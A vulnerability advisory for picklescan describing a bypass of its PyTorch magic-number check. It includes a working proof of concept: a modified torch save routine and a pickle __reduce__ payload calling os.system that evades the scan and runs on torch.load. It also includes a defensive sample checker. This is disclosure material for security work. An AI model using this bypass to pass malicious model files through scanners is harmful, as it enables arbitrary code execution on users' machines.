PT-2026-22492 · Pypi · Picklescan
Published 2026-02-18 · Updated 2026-02-18
CVSS v4.0: 7.1 (High)
| Vector | AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N |
Summary
This is a scanning bypass of the PyTorch scanning function in picklescan. The picklescan implementation of get_magic_number() uses pickletools.genops(data) to read the magic number and only accepts it when the opcode name contains INT or LONG, whereas PyTorch's own implementation simply calls pickle_module.load() to read the same value. Because of this implementation difference, the magic number can be embedded in the PyTorch file through a dynamic eval on the __reduce__ trick: pickletools.genops(data) then finds no INT or LONG opcode carrying the magic number, while pickle_module.load() still returns the same magic number, leading to a bypass.

PoC
Attack Step 1
We can edit the source code of the function _legacy_save() as follows:

```python
# Instead of dumping the magic number as an INT/LONG literal, dump an object
# whose __reduce__ evaluates the MAGIC_NUMBER name at load time.
class payload:
    def __reduce__(self):
        return (eval, ('MAGIC_NUMBER',))

pickle_module.dump(payload(), f, protocol=pickle_protocol)
```

Attack Step 2
With the modified version of PyTorch, we run the following PoC to generate payload.pt:

```python
import torch

class payload:
    def __reduce__(self):
        return (__import__('os').system, ('touch /tmp/hacked',))

# Legacy (non-zip) serialization, so the magic number is the first pickle record.
torch.save(payload(), './payload.pt', _use_new_zipfile_serialization=False)
```

Picklescan result
ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356
----------- SCAN SUMMARY -----------
Scanned files: 0
Infected files: 0
Dangerous globals: 0

Victim Step
```python
import torch
torch.load('./payload.pt', weights_only=False)
```

Then you can find the illegal file /tmp/hacked created on your local system.

Impact
Craft malicious PyTorch payloads to bypass picklescan, then achieve ACE/RCE.

Fix
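The root cause is two readers disagreeing about one record: a literal-only opcode scan returns None, while a full unpickle returns the number. The check below is an added example written for this advisory, not picklescan's or PyTorch's code; the magic number constant is taken from the scan output above, and the opcode set and the builtins.int sample stream are constructed here. It shows a hardened scanner treating a non-literal magic-number record as a finding instead of aborting with "Invalid magic number".

```python
import pickle
import pickletools

# Assumptions (not taken from picklescan's or PyTorch's source): the legacy-format
# magic number as shown in the scan output above, and the opcodes that import or
# call something when the stream is loaded.
MAGIC_NUMBER = 119547037146038801333356
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ",
                "NEWOBJ_EX", "BUILD"}

def literal_magic(data):
    """Simplified model of the reader the advisory describes for picklescan:
    only an INT/LONG opcode counts; anything else yields None."""
    for opcode, arg, _pos in pickletools.genops(data):
        if "INT" in opcode.name or "LONG" in opcode.name:
            return arg
        if opcode.name == "STOP":
            break
    return None

def pytorch_style_read(data):
    """Model of the reader the advisory describes for PyTorch: plain unpickling."""
    return pickle.loads(data)

def check_magic(data):
    """Hardened check over the first pickle record in `data`.
    Returns ("ok", value) for a plain literal equal to MAGIC_NUMBER, ("unsafe",
    [opcodes]) when the record imports or calls anything, else ("invalid", value)."""
    names, value = [], None
    for opcode, arg, _pos in pickletools.genops(data):
        names.append(opcode.name)
        if value is None and ("INT" in opcode.name or "LONG" in opcode.name):
            value = arg
        if opcode.name == "STOP":
            break
    code_ops = [n for n in names if n in CODE_OPCODES]
    if code_ops:
        return ("unsafe", code_ops)          # a finding, never a silent None
    if value == MAGIC_NUMBER:
        return ("ok", value)
    return ("invalid", value)

# Constructed samples. BENIGN is the literal header a normal legacy .pt starts with.
BENIGN = pickle.dumps(MAGIC_NUMBER, protocol=2)
# SUSPICIOUS unpickles to the same integer, but via GLOBAL+REDUCE on the harmless
# builtins.int instead of a literal, so an INT/LONG-only reader sees nothing.
SUSPICIOUS = b"cbuiltins\nint\n(S'119547037146038801333356'\ntR."
```

On BENIGN all three readers agree; on SUSPICIOUS literal_magic() returns None and pytorch_style_read() returns the magic number, which is exactly the gap the advisory exploits, and check_magic() reports it as unsafe.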
Incomplete List of Disallowed Inputs
Weakness Enumeration
Related Identifiers
Affected Products
Picklescan